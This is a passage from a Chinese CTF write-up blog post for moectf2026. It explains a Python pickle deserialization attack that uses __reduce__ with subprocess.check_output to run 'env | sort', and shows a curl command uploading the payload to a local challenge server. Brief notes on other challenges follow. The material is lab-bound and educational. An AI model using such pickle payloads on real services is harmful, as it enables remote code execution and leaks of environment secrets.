class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f"[+] payload generated: <span class="hljs-subst">{OUTPUT}</span>"</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f"[+] size: <span class="hljs-subst">{OUTPUT.stat().st_size}</span> bytes"</span>)<br></code></pre></td></tr></table></figure>

<ol>
<li>.pkl是pickle序列化数据的一般格式</li>
<li>pickle.dumps用来序列化对象，类似于php的serialize函数</li>
<li><code>__reduce__</code>是 pickle 用来获取“对象重建方式”的特殊方法,用以在重建时调用函数</li>
<li>subprocess.check_output是 Python 标准库subprocess中的函数，用来启动一个外部程序，并捕获它的标准输出。</li>
<li>check_output 不是 pickle 的特殊函数，它只是一个适合本题回显链的普通函数。<br>  它有两个特点：可以执行外部命令，可以返回命令的标准输出。如果使用如果使用只返回退出码的函数，例如：os.system(“env | sort”)，无法在预览中获得回显。</li>
</ol>
<p>生成payload文件后发送实现反序列化</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">curl</span> -sS -i --max-time <span class="hljs-number">15</span> <span class="hljs-punctuation">\</span><br><span class="hljs-punctuation"></span>-F 'file=@/tmp/subdiary-exp.pkl;filename=logs.pkl' <span class="hljs-punctuation">\</span><br><span class="hljs-punctuation"></span>http://<span class="hljs-number">127.0.0.1:43609</span>/import<br></code></pre></td></tr></table></figure>
<p>执行可获得flag</p>
<h2 id="礼崩乐坏-thinking"><a href="#礼崩乐坏-thinking" class="headerlink" title="礼崩乐坏[thinking]"></a>礼崩乐坏[thinking]</h2><h1 id="开发与运维基础"><a href="#开发与运维基础" class="headerlink" title="开发与运维基础"></a>开发与运维基础</h1><p>没打过，打着看看？</p>
<h2 id="当-Nginx-不在家"><a href="#当-Nginx-不在家" class="headerlink" title="当 Nginx 不在家"></a>当 Nginx 不在家</h2><p>根据题目描述连接靶机，注意到3000端口，简单nc一下<br>多nc几次就会发现这个端口一直在被post /flag,读取ch的字段并完整拼接<br><code>moectf{WEB-s3rver-PRov1dE-r3li4BI3-5erVlCe-f0r-tHE-WOR1d0}</code></p>
<h2 id="网站日志取证大师"><a href="#网站日志取证大师" class="headerlink" title="网站日志取证大师"></a>网站日志取证大师</h2><p>谢邀，做不来取证…….眼睛要瞎了。<br>codex分析的不要打我口牙（<br><code>moectf{11-curl/8.7.1-2214-CVE-2017-9841-235216-000808}</code></p>
<h1 id="总结-unfinished"><a href="#总结-unfinished" class="headerlink" title="总结(unfinished)"></a>总结(unfinished)</h1><p>比去年举步维艰的情况来说，今年打moe确实轻松了不少，感觉自己取得了一些进步！包括对自己擅长的部分敏锐度提高了很多，简单的题能顺利地梳理出思路。</p>
<p>不过也意识到自己仍然有很多不足之处，比如说对于自己没那么熟悉的语言比如python和java,往往要借助ai进行分析;不熟悉的知识点，也通常要利用ai去先解决题目，自己再通过复现进行反刍……不知道是说更会使用ai,提示词更准确，还是说更依赖ai了……这到底是好事还是坏事呢？</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/wp/" class="category-chain-item">wp</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/" class="print-no-link">#ctf</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>moectf2026</div>
      <div>https://b1ank799.github.io/2026/09/16/moectf2026个人wp/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>blank</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>September 16, 2026</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/05/24/Graph/" title="Graph">
                        <span class="hidden-mobile">Graph</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
